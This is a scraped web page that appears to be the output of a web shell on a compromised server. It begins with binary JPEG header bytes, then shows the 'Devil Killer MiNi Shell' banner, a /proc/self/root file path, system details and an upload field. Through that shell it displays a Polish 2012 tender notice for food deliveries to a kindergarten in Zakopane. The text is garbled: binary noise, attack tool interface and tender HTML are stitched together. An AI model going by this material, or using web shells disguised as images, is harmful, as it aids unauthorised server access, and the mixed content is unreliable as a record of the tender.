JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121130/254471-N-2012.html

<p class="kh_header"><b>Zakopane: Przetarg nieograniczony 
na dostawę artykułów żywnościowych na potrzeby   Przedszkola nr 3  w Zakopanem przy ul. Kasprusie 27</b><br>
<b>Numer ogłoszenia: 254471 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 3 im. Karola Szymanowskiego , ul. Kasprusie 27, 34-500 Zakopane, woj. małopolskie, tel. 18 20 152 21, faks 18 20 152 21.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony 
na dostawę artykułów żywnościowych na potrzeby   Przedszkola nr 3  w Zakopanem przy ul. Kasprusie 27.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 3 w Zakopanem z siedziba przy ul. Kasprusie 27

 Zakres zamówienia obejmuje : 

Zadanie nr 1 - Dostawa nabiału

l.p.	Nazwa	jm	ilość
1.	Maślanka naturalna	kg	40
2.	Mleko świeże typu Mlekowita (luz)2,5% t lub równoważne	l.	3000
3.	Masło ekstra 82% tłuszczu 200g typu Mlekowita lub równoważne	szt.	700
4.	Twaróg półtłusty wiejski 200g typu Mlekowita lub równoważne	kg	250
5.	Serek homog. owocowy 135g (typu Darek Mlekowita) lub równoważny  MIX.	szt.	600
6.	Ser żółty (edamski) typu Mlekowita lub równoważny	kg	20
7.	Jogurt typu Jogobella 150g (mix) lub równoważny	szt.	600
8.	Śmietana 400ml. 18 % typu Mlekowita lub równoważna	szt	720
9.	Serek topiony l00g krem typu Mlekowita lub równoważna	kg	25
10.	Margaryna mleczna typu Mlekowita 250 g lub równoważna	kg	55
11.	Kefir naturalny 2% typu Mlekowita lub równoważny	1.	    70
12.	Ser żółty (Prymus,Dziurdamer)	kg.	30
13.	Mleko spożywcze Polskie 2% tł. top	l.	500
14.	Śmietanka 30%200ml. z Mlekowity	szt.	40

Zadanie nr 2 - Dostawa  owoców i warzyw

Lp.	Nazwa	jm.	ilość
1	Banany	Kg.	240
2	Buraki ćwikłowe	Kg.	250
3	Cebula	Kg.	200
4	Cytryny	Kg.	50
5	Fasola Jaś 0,5 kg	Kg.	40
6	Groch łuszczony połówki 0,5 kg	Kg.	25
7	Gruszki	Kg.	300
8	Jabłka deserowe	Kg.	500
9	Maliny (400g)	Szt.	50
10	Kalafior	Szt.	40
11	Kapusta biała	Kg.	190
12	Kapusta czerwona	Kg.	60
13	Kapusta kwaszona	Kg.	220
14	Mandarynki	Kg.	80
15	Marchew korzeń	Kg.	420
16	Ogórek kwaszony 400g	Szt.	72
17	Ogórek świeży	Kg.	80
18	Papryka świeża	Kg.	35
19	Pieczarki	Kg.	30
20	Pietruszka korzeń	Kg.	120
21	Pomidor	Kg.	100
22	Rzodkiewka	Pęcz.	120
23	Sałata zielona	Szt.	140
24	Seler	Kg.	100
25	Szczypior	Pęcz.	120
26	Śliwki	Kg.	50
27	Ziemniaki	Kg.	4000
28	Pietruszka natka 25g	Pęcz.	400
29	Por	Szt.	70
30	Koperek zielony	Pęcz.	400
31	Kapusta pekińska	Szt.	100
32	Kapusta włoska	Szt.	75
33	Brokuły	Szt.	25
34	Botwinka	Pęcz.	20
35	Winogrona	Kg.	50
36	Kiwi	Kg.	100
37	Brzoskwinia lub nektarynka	Kg.	90
38	Pomarańcza	Kg.	100
39	Czosnek polski	Szt.	60
40	Truskawki	Kg.	80
41	Arbuz	Kg.	50
42	Ogórek konserwowy słoik 0,9 L.	Szt.	60
43	Jaja kurze XL kl. I	Szt.	3600

Zadanie nr 3 - Dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu, wyrobów drobiarskich.

Lp.	Nazwa	j.m.	ilość
1	Karczek bk	kg.	80
2	Kiełbasa szynkowa (wieprzowa)	kg.	25
3	Kiełbasa toruńska	kg.	15
4	Szynka konserwowa wieprzowa	kg.	30
5	Kurczak świeży	kg.	250
6	Serdelki	kg.	80
7	Szynka wiejska wieprzowa	kg.	20
8	Szynka drobiowa,filet z indyka	kg.	10
9	Szynka wieprzowa gotowana	kg.	20
10	Mięso wołowe pieczeniowe	kg.	43
11	Kiełbasa zwyczajna	kg.	60
12	Parówki cielęce	kg.	50
13	Porcja rosołowa drobiowa	kg.	250
14	Schab wieprzowy bkości	kg.	130
15	Szynka wieprzowa bk surowa,kulki	kg.	80
16	Mięso rosołowe wołowe	kg.	50
17	Wątroba drobiowa	kg.	25
18	Łopatka wieprzowa bk	kg.	50
19	Boczek wędzony	kg.	45
20	Filet z indyka	kg.	36
21	Filet z kury	kg.	120
22	Mięso mielone wieprzowo cielęce	kg.	120
23	Mięso wołowe, gulasz, pręga	kg.	60
24	Słonina świeża i wędzona	kg.	50
25	Udziec z indyka	kg.	60
26	Smalec luzem	kg.	50
Zadanie nr 4 - Dostawa pieczywa
Lp.	Nazwa	jm	ilość
1.	Chleb graham 500 g	szt.	180
2.	Chleb krojony 600g pszenno-żytni	szt.	600
3.	Chałka z kruszonką 600g	szt.	80
4.	Bułka mała kajzerka 0,06	szt.	150
5.	Chleb pszenny 500g 	szt.	600
6.	Drożdżówki mieszane 80g	szt.	1200
7.	Chleb słonecznikowy	szt.	100
8.	Rogaliki z marmoladą 80g	szt.	600

Zadanie nr 5 - Dostawa różnych produktów spożywczych

Lp.	Nazwa	j.m.	ilość
1	Galaretka owocowa 75g (MIX) typu WINIARY lub równoważne	szt.	300
2	Cukier biały l kg ( królewski)	kg	600
3	Cukier puder 0,5 kg	kg	35
4	Cukier waniliowy 32g	szt.	40
5	Dżem słoik 300g (mix) typu Łowicz lub równoważny	szt.	90
6	Groszek konserwowy 400g typu
Kwidzyn lub równoważny	szt.	80
7	Herbata cz. granulowana typu saga 100g lub  saga (mix) owocowa 100g.	szt.	120
8	Kakao ciemne 200gDecamoreno	szt.	30
9	Kasza jęczmienna typu mazurska l kg	kg	100
10	Kawa zbożowa Inka 15Gg lub równoważne	szt.	60
11	Ketchup 250g typu Tortex lub równoważny	szt.	90
12	Konserwa rybna w sosie pomidorowym 170g(szprot)	szt.	120
13	Kukurydza 400g typu Kwidzyn lub równoważna	szt,	50
14	Liść laurowy 7g	szt	30
15	Maggi typu Winiary lub równoważna 11	szt.	66
16	Majeranek 7g	szt.	30
17	Majonez typu kielecki 310 ml lub równoważny	szt.	30
18	Miód wielokwiatowy 400g	szt.	40
19	Płatki śniadaniowe Nestle Kangus 250g lub równoważne	kg	25
20	Kucharek przyprawa do potraw 1 kg	szt.	60
21	Olej kujawski 1l.	szt.	220
22	Pieprz mielony czarny 20g	szt.	100
23	Płatki śniadaniowe kukurydziane 250g	kg	25
24	Przecier pomidorowy 30% typu Bażant 800g lub równoważny	szt.	80
25	Ryż 1 kg biały	kg	130
26	Syrop Malinowy 0,5 1 typu Paola lub równoważny	szt.	35
27	Sól jodowana l kg	kg	150
28	Ziele angielskie 15g	szt.	45
29	Makaron typu Lubella - świderki, kolanka 0,5 kg lub równoważny	szt.	200
30	Makaron nitki Lubella 0,5 kg lub równoważny	szt.	100
31	Płatki owsiane górskie 500g ekstra	kg	15
32	Ciastka kruche różne 2 kg (maślane Babuni) lub równoważne	szt.	60
33	Kminek 30g	szt.	25
34	Kwasek cytrynowy 20g	szt.	40
35	Makaron łazanka mała 0,5 kg typu lubella	szt.	70
36	Przyprawa Delikat do drobiu l kg lub równoważne  Knorr	szt.	5
37	Kasza kukurydziana 0,5kg ( drobna)	kg	25
38	Kasza manna l kg	kg	50
39	Bułka tarta 0,5 kg Wrocławska	kg	110
40	Cynamon 20 g	szt.	15
41	Budyń śmietankowy 38 g bez cukru typu Winiary lub równoważne	szt.	60
42	Kisiel mix typu Winiary 38g bez cukru lub równoważne	szt.	300
43	Mąka ziemniaczana 0, 5 kg	kg	30
44	Makaron Zacierka Babuni 250g.	szt	60
45	Pasztet drobiowy 160g	szt.	120
46	Mąka typ 450 pszenna typu Poznańska lub równoważne	kg	400
47	Sok w kartonie 21 Caprio lub równoważne	szt.	500
48	Szczaw w słoiku 180 g	szt.	60
49	Chrzan tarty typu Polonez 180 g lub równoważne	szt.	30
50	Kompot z czarnej porzeczki 0,9 1	szt.	32
51	Kompot z aronii 0,91	szt.	32
52	Kompot z truskawek 0,91.	szt.	32
53	Przyprawa Delikat   Prymat do mięs i ryb lub równoważne100g.	szt.	30
54	Woda mineralna lekko gazow, typu Muszynianka lub równoważna 1,51	szt.	500
55	Musztarda delikatesowa 180g typu Roleski lub równoważna	szt.	30
56	Krem orzechowy Nutella lub równoważny230g.	szt.	90
57	Konserwa rybna (tuńczyk w oleju w kawałkach) 175g	szt.	100
58	Wafle różne typu Grześki lub równoważne	szt.	700
59	Żelki jogurtowe nim  2 -100g.	szt.	150
60	Morele suszone luz	kg	20
61	Rodzynki sułtańskie 100g.	szt.	15
62	Orzechy włoskie luz	kg.	6
63	Herbatniki bebe (48szt w opakowaniu).	szt	80
64	Makaron MIX  Knorr	kg	30
65	Princpolo 36g. klasyczne	szt.	900
66	Filet z (dorsz,panga,mintaj,morszczuk -schaterpak)	kg	100
67	Kalafior 2,5kg	kg	50
68	Mieszanka jarzynowa 6 składnikowa	kg	55
69	Mieszanka kompotowa 500g.	kg	100
70	Brokuły mrożone	kg	40
71	Szpinak mielony	kg	15
72	Fasola szparagowa 2,5kg	kg	50
73	Miód spadziowy 400g	szt	30
74	Sok owocowyKubuś900ml MIX	szt	1000
75	Czekolada deserowa typu Wawel lub równoważna 100g	szt	300



         Zamawiający informuje ,że podane  powyżej ilości artykułów żywnościowych są  ilościami szacunkowymi i w trakcie realizacji zamówienia mogą ulec zmniejszeniu. Zamawiający będzie  płacił za faktycznie   zamówione ilości produktów po cenach jednostkowych podanych w ofercie. 

Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi przedmiotu zamówienia jak również zgodność z odpowiednimi normami.
Zamawiający wymaga, aby wykonawca ubiegający się o udzielenie zamówienia spełniał wszelkie wymagania higieniczne określone w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. 2006 r. Nr 171 poz. 1225 z późn. zm.) oraz obowiązujących aktów wykonawczych wydanych na jej podstawie.

Produkty powinny być świeże, zgodne z normami: PN-A-86003, PN-A-86059, PN-66/A-86233, PN-68/A-86230, PN-A-86155, PN-A-86061, PN-91/A-86300.

Miejscem dostawy jest magazyn żywnościowy  Przedszkola Nr 3 w Zakopanem ul. Kasprusie 27
Umowa będzie realizowana w oparciu o zamówienia częściowe, które będą składane telefonicznie lub pisemnie przesłane faxem zgodnie z faktycznymi potrzebami Zamawiającego, zgodnie z cenami jednostkowymi zaproponowanymi 
w ofercie wykonawcy z zastrzeżeniem,  że całkowita wartość umowy nie może przekroczyć wysokości posiadanych środków finansowych przeznaczonych na ten cel.
 
Dostawy  będą  realizowane  najpóźniej następnego dnia do godz. 8.00, licząc od daty złożenia, najpóźniej poprzedniego dnia do godz. 9.00, telefonicznie zamówienia  na poszczególne produkty z pakietów, o ile zamówienie nie zostanie złożone wcześniej, niż na jeden dzień przed żądaną dostawą i nie zostanie wyznaczony przez Zamawiającego konkretny termin realizacji dostawy.

W wyjątkowych sytuacjach mogą wystąpić zamówienia dodatkowe  realizowane w tym samym dniu. 

 Wykonawca podejmuje się również rozładunku towaru i przeniesienia go do magazynu żywnościowego w  Przedszkolu nr 3 przy ul. Kasprusie 27 

Wykonawca zobowiązuje się każdorazowo przy dostawie załączyć świadectwo jakości dostarczanego przedmiotu umowy (atest) lub handlowy dokument identyfikacyjny.

Wykonawca zobowiązuje się dostarczać przedmiot umowy czystym środkiem transportu przystosowanym do przewozu przedmiotu umowy a w przypadku  przewozu mięsa i wędlin  pojazdem dopuszczonym do użytkowania  przez Państwową Inspekcję Handlową
 W przypadku stwierdzenia przez Zamawiającego wadliwej partii dostarczonego towaru, reklamacja zostanie zgłoszona telefonicznie. Wykonawca zobowiązuje się niezwłocznie do jego wymiany na towar wolny od wad w ciągu 3 godzin, w ilościach zakwestionowanych przez Zamawiającego.

W przypadku nie przestrzegania terminu dostaw oraz powtarzających się uchybień w realizacji warunków umowy, Zamawiający zastrzega sobie prawo zerwania umowy bez wypowiedzenia.

Każdy samochód, którym będzie dostarczana żywność musi posiadać decyzję Państwowego Powiatowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów (art.spoż, warzywa, owoce, jaja, mięso i wędliny itp.)

 Zamawiający zastrzega sobie prawo do zażądania stosownego dokumentu w momencie dostawy produktów.

Jaja, przy każdej dostawie, muszą posiadać dokument identyfikacyjny dla jaj konsumpcyjnych spełniających wymogi art. 27 ust. 3 ustawy z dn20.01.2004r o wymaganiach weterynaryjnych produktów pochodzenia zwierzęcego (Dz.U. nr 33, poz. 288 z późn. zm.)

Mięso i wędliny muszą być dostarczane w czystych, zamkniętych pojemnikach do przewozu mięsa i wędlin. Mięso surowe nie może być przewożone razem z wędlinami

Mrożonki mają być dostarczane do przedszkola w formie nie rozmrożonej,

Nie wykonanie pełnego zakresu ilościowego umowy nie rodzi roszczenia o zakup nie zrealizowanej w okresie obowiązywania umowy ilości towaru.


Zamawiający  dopuszcza składanie ofert równoważnych.

          Zamawiający podał nazwy producentów  wyłącznie w celu określenia wymaganego asortymentu i parametrów jakościowych, jakim powinny odpowiadać zamawiane  produkty. Zamawiający dopuszcza produkty równoważne. W przypadku zaoferowania asortymentu równoważnego, Wykonawca jest zobowiązany wykazać, że oferowany przez niego produkt spełnia wymagania określone przez Zamawiającego. Na potwierdzenie spełniania wymagań, Wykonawca przedłoży do oferty 
specyfikację produktu równoważnego oferowanego przez Wykonawcę która ma zawierać wyszczególnione cechy charakterystyczne, potwierdzające zgodność oferowanego asortymentu z asortymentem opisanym przez Zamawiającego ( np skład,  wagę , gramaturę  itp.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.55.10.00-5, 03.22.00.00-9, 03.14.25.00-3, 15.10.00.00-9, 15.11.20.00-6, 15.81.10.00-6, 15.80.00.00-6, 15.22.10.00-3, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postepowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca jest zobowiązany dołączyć do oferty wypełniony  formularz cenowy proponowanych artykułów - zgodnie ze wzorem formularza stanowiącego załącznik nr 7 do  siwz.  Zamawiający wymaga wypełnienia każdej pozycji formularza</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie: Cena jednostkowa danego produktu  może ulec zmianie w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT ,przy czym zmianie ulegnie wyłącznie cena  jednostkowa brutto, ceny  jednostkowe   netto pozostaną  bez zmian.

Zamawiający przewiduje możliwość podwyższenia cen jednostkowych poszczególnych produktów raz na kwartał o wskaźnik wzrostu cen towarów i usług konsumpcyjnych za dany kwartał publikowany w Monitorze Polskim (tzw. klauzula waloryzacyjna). O zmianę cen winien wystąpić pisemnie Wykonawca, dokumentując Zamawiającemu zaistnienie powyższego faktu. Ceny zostaną podwyższone z pierwszym dniem miesiąca następującego po miesiącu, w którym złożono pismo o zmianę cen;

Zmiana cen w wyniku gwałtownego wzrostu cen rynkowych (tj. powyżej 5%) może następować w okresach jednomiesięcznych.

Przewiduje sie możliwość w sezonie na dane owoce i warzywa   z wystąpieniem do wykonawcy o obniżenie cen jednostkowych w stosunku do podanych w ofercie

Zmiana cen z ww powodów nie wymaga wypowiedzenia warunków umowy a jedynie  aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 3 w Zakopanem 
ul. Kasprusie 27
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 12:00, miejsce: Przedszkole Nr 3 w Zakopanem 
ul. Kasprusie 27
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 3 w Zakopanem z siedziba przy ul. Kasprusie 27

 Zakres zamówienia obejmuje : 

Zadanie nr 1 - Dostawa nabiału

